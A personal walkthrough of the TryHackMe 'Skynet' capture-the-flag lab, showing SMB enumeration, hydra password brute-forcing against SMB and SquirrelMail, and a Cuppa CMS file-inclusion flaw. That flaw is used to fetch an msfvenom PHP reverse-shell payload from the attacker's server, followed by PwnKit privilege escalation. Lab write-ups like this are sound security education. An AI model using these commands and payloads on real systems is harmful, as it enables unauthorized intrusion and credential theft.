Skynet THM CTF Walkthrough
Welcome to my little walkthrough for THM's Skynet challenge :D
I have no idea what this will be so without too much talking let's get started!
Initial enumeration
First do blind stuff just trying to get an idea of what to do next!
Let's start with classic nmap, I didn't append the whole output because what really matters is what's open.
Open ports
445 - SMB - Should try to enumerate as anonymous
80 - HTTP - Biggest point of interest, manually check it out and probably most stuff will play here over time
139 - SMB - Same as the first one
143 - IMAP - Maybe attempt to connect and check for interesting stuff on emails???
110 - POP3 - Same as the last one
22 - SSH - Useful if I get creds
Decent surface of attack, 4 things it seems: HTTP, IMAP, POP3, SMB.
Discarding some like SSH which will only go if we get creds.
Website functionality
Just a search input and button, request always looking like:
POST / HTTP/1.1
Host: 10.X.X.X
Content-Length: 20
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.X.X.X
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.X.X.X/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
submit=Skynet+Search
Changing the submit value seems to have no effect, site is confirmed to be built with PHP.
These CTFs rarely put what's needed at /, so I in the meantime ran dirsearch to attempt to find any dirs, would recommend you to start running it.
SMB Shares
There's an anonymous and milesdyson share. Only anonymous is readable, it has an attention.txt saying:
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
And also inside logs/ some log files, with the only one with actual content containing:
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
These are either users or maybe passwords (even better).
Now I think we know enough and can actually read what the questions are and see how to use our knowledge.
1st Question
Attempts against SMB
This one is to get Miles password for his emails (very likely POP3 and IMAP ports, which seems like they are present because a SquirrelMail is hosted at /squirrelmail which I found with dirsearch).
So... now we have a bunch of vectors, the first one I tried was to attempt to access the milesdyson share, user very likely going to be the same name, and password one of the ones in the log file.
With hydra we can do a dictionary attack:
hydra -l milesdyson -P 10.X.X.X-anonymous_logs_log1.txt smb://10.X.X.X
Though this one didn't exactly work... What I noticed is that milesdyson IS the right username as other options give an anonymous success.
My next idea was to maybe use the same log to attempt usernames:
hydra -L 10.X.X.X-anonymous_logs_log1.txt -P 10.X.X.X-anonymous_logs_log1.txt smb://10.X.X.X
But all returned that the account didn't exist... just in case I downloaded the other logs but as mentioned before they are empty.
Now, what if directly going against the SquirrelMail?
Attempts against SquirrelMail
The login page already reveals the version: 1.4.23.
A direct version for it on ExploitDB doesn't show much, however deeaper searches reveal it's quite old, and has all sort of vulns: LFI, XSS, HTML injection, XSS, etc. But most of these need some sort of foothold, so first let's just brute-force milesdyson with our log file but on SquirrelMail.
The command would be:
hydra -V -l milesdyson -P 10.X.X.X-anonymous_logs_log1.txt 10.X.X.X http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect"
Wait 3 seconds, and we get:
[80][http-post-form] host: 10.X.X.X login: milesdyson password: [go do it yourself!]
With this we can answer the question and do a successful login at /squirrelmail.
2nd Question
Now this wants a directory! Spoiler alert: dirsearch nor gobuster are helping!
Before anything, remember the credentials for SquirrelMail? Well, go there and there are some emails, one which has "Samba Password reset" has the subject, open it and it indicates that the SMB password has been reset to:
)s{A&2Z=[truncated! once again, go do it yourself!]
There are two other emails, each one respectively with: binary data, and random text.
But let's go step by step, first let's access the SMB share "milesdyson" with our password and user of the same name of the share.
milesdyson READ ONLY Miles Dyson Personal Share
./milesdyson
dr--r--r-- 0 Tue Sep 17 03:05:47 2019 .
dr--r--r-- 0 Tue Sep 17 21:51:02 2019 ..
fr--r--r-- 5743095 Tue Sep 17 03:05:14 2019 Improving Deep Neural Networks.pdf
fr--r--r-- 12927230 Tue Sep 17 03:05:14 2019 Natural Language Processing-Building Sequence Models.pdf
fr--r--r-- 19655446 Tue Sep 17 03:05:14 2019 Convolutional Neural Networks-CNN.pdf
dr--r--r-- 0 Tue Sep 17 03:18:40 2019 notes
fr--r--r-- 4304586 Tue Sep 17 03:05:14 2019 Neural Networks and Deep Learning.pdf
fr--r--r-- 3531427 Tue Sep 17 03:05:14 2019 Structuring your Machine Learning Project.pdf
There are mostly just random PDFs, though the notes/ directory looks interesting.
milesdyson READ ONLY Miles Dyson Personal Share
./milesdysonnotes
dr--r--r-- 0 Tue Sep 17 03:18:40 2019 .
dr--r--r-- 0 Tue Sep 17 03:05:47 2019 ..
fr--r--r-- 65601 Tue Sep 17 03:01:29 2019 3.01 Search.md
fr--r--r-- 5683 Tue Sep 17 03:01:29 2019 4.01 Agent-Based Models.md
fr--r--r-- 7949 Tue Sep 17 03:01:29 2019 2.08 In Practice.md
fr--r--r-- 3114 Tue Sep 17 03:01:29 2019 0.00 Cover.md
fr--r--r-- 70314 Tue Sep 17 03:01:29 2019 1.02 Linear Algebra.md
fr--r--r-- 117 Tue Sep 17 03:18:39 2019 important.txt
fr--r--r-- 9221 Tue Sep 17 03:01:29 2019 6.01 pandas.md
fr--r--r-- 33 Tue Sep 17 03:01:29 2019 3.00 Artificial Intelligence.md
fr--r--r-- 1165 Tue Sep 17 03:01:29 2019 2.01 Overview.md
fr--r--r-- 71657 Tue Sep 17 03:01:29 2019 3.02 Planning.md
fr--r--r-- 62712 Tue Sep 17 03:01:29 2019 1.04 Probability.md
fr--r--r-- 82633 Tue Sep 17 03:01:29 2019 2.06 Natural Language Processing.md
fr--r--r-- 26 Tue Sep 17 03:01:29 2019 2.00 Machine Learning.md
fr--r--r-- 40779 Tue Sep 17 03:01:29 2019 1.03 Calculus.md
fr--r--r-- 25119 Tue Sep 17 03:01:29 2019 3.03 Reinforcement Learning.md
fr--r--r-- 81655 Tue Sep 17 03:01:29 2019 1.08 Probabilistic Graphical Models.md
fr--r--r-- 39554 Tue Sep 17 03:01:29 2019 1.06 Bayesian Statistics.md
fr--r--r-- 20 Tue Sep 17 03:01:29 2019 6.00 Appendices.md
fr--r--r-- 7627 Tue Sep 17 03:01:29 2019 1.01 Functions.md
fr--r--r-- 144726 Tue Sep 17 03:01:29 2019 2.03 Neural Nets.md
fr--r--r-- 33383 Tue Sep 17 03:01:29 2019 2.04 Model Selection.md
fr--r--r-- 94287 Tue Sep 17 03:01:29 2019 2.02 Supervised Learning.md
fr--r--r-- 20 Tue Sep 17 03:01:29 2019 4.00 Simulation.md
fr--r--r-- 1123 Tue Sep 17 03:01:29 2019 3.05 In Practice.md
fr--r--r-- 5110 Tue Sep 17 03:01:29 2019 1.07 Graphs.md
fr--r--r-- 21579 Tue Sep 17 03:01:29 2019 2.07 Unsupervised Learning.md
fr--r--r-- 39443 Tue Sep 17 03:01:29 2019 2.05 Bayesian Learning.md
fr--r--r-- 2516 Tue Sep 17 03:01:29 2019 5.03 Anonymization.md
fr--r--r-- 5788 Tue Sep 17 03:01:29 2019 5.01 Process.md
fr--r--r-- 25823 Tue Sep 17 03:01:29 2019 1.09 Optimization.md
fr--r--r-- 64291 Tue Sep 17 03:01:29 2019 1.05 Statistics.md
fr--r--r-- 940 Tue Sep 17 03:01:29 2019 5.02 Visualization.md
fr--r--r-- 21 Tue Sep 17 03:01:29 2019 5.00 In Practice.md
fr--r--r-- 44601 Tue Sep 17 03:01:29 2019 4.02 Nonlinear Dynamics.md
fr--r--r-- 28790 Tue Sep 17 03:01:29 2019 1.10 Algorithms.md
fr--r--r-- 13360 Tue Sep 17 03:01:29 2019 3.04 Filtering.md
fr--r--r-- 22 Tue Sep 17 03:01:29 2019 1.00 Foundations.md
Once again a file, in this case important.txt stands out. To download it we can use the following command:
smbmap -H 10.X.X.X -u "milesdyson" -p ')s{A&2Z=[truncated]' --download 'milesdyson/notes/important.txt'
Then, we see its contents:
1. Add features to beta CMS /45kra[truncated]
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
With that we now found the hidden directory, which mentions a "beta CMS" is there.
3rd Question
This is probably just a spoiler on the vuln we'll exploit: remote file inclusion.
4th Question
Ok, so let's see... the hidden directory just has a simple page that seems to have no logic on it. Going back to SquirrelMail my first idea was to check out the strange emails from before, the binary from before can't get converted by CyberChef, and the random text seems to have no meaning so I marked them as red herrings.
After a bunch of research I found nothing on SquirrelMail, so I decided to pivot to the "beta CMS" mentioned before. I threw dirsearch at it and managed to find an /administrator/ throwing 200 status codes.
Inside we got a new attack surface as this CMS is Cuppa CMS, right now we just have the login form.
I originally tried a bunch of creds but got nothing, so after quite a long time at attempting brute force I went for searching remote file inclusion and see if they didn't depend on being authenticated.
The only exploit against CuppaCMS in ExploitDB offered just what we needed: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion - PHP webapps Exploit
This looks promising so I tried out, first of all the equivalent of /cuppa for our target would actually be /45kra24zxs28v3yd/administrator/, then we get the path /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php. Finally we attempt some payloads (?urlConfig=../../../../../../../../../etc/passwd), the whole thing would look like: /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd.
So I go to the browser's URL tab, put that in and...
YES! We have LFI, and potentially RFI too! So I immediately prepared a payload, in my case I preferred using msfvenom to make a meterpreter payload to start immediately with a decent shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.X.X.X LPORT=4444 -f raw > shell.txt
Then do the usual setup on msfconsole to receive the shell, and finally through a Python HTTP server you can run the payload:
http://10.X.X.X/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.X.X.X:8080/shell.txt
Finally, we can do some stuff such as getting the login credentials:
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
Though now we know they weren't needed, as we can continue traversing the filesystem until finding the user.txt file on /home/milesdyson:
7ce[truncated]
5th Question
Finally, we are on the last step! Seems we are going to need some privilege escalation. I decided to start a normal shell and do some initial recon. The classics such as whoami and looking for SUID stuff, maybe pkexec?
I quickly got lots of ideas on possibilities, but to not loss time on rabbit holes I decided to take a look at the hint which said: "A recursive call"...
Pretty sure this references either two things. Maybe PwnKit because the classic PwnKit vuln involves pkexec calling itself recursively exploiting how it parses arguments and environment variables.
Or... it could also be cron jobs.
Either way, the one that could be easiest to exploit and that by running pkexec --version seems like it should work is PwnKit.
In case they were needed even gcc and make are installed, though precompiled binaries should be more than enough. So through meterpreter I sent the binary to /tmp/exploit. Afterwards just chmod and run it and see how whoami now says root.
FINALLY! Just go and cat /root/root.txt:
3f0[truncated]
Conclusion
Overall this was a really fun CTF, it used quite a bunch of vulns, I also checked out the official walkthrough to compare. Apparently "A recursive call" referred to exploiting a bunch of cron jobs with weak permission, but PwnKit did the same but better anyways and was what seemed the easiest to exploit.
Another nice thing is that it covered quite a bunch of areas: SMB enumeration, dictionary attacks with hydra, directory enumeration, and a bunch of searches at ExploitDB.
Hopefully unlike others this walkthrough doesn't just show you the process to solve this CTF, but also the thinking I had.
Remember you can drop me a DM on Discord for suggestions! See you next time! :D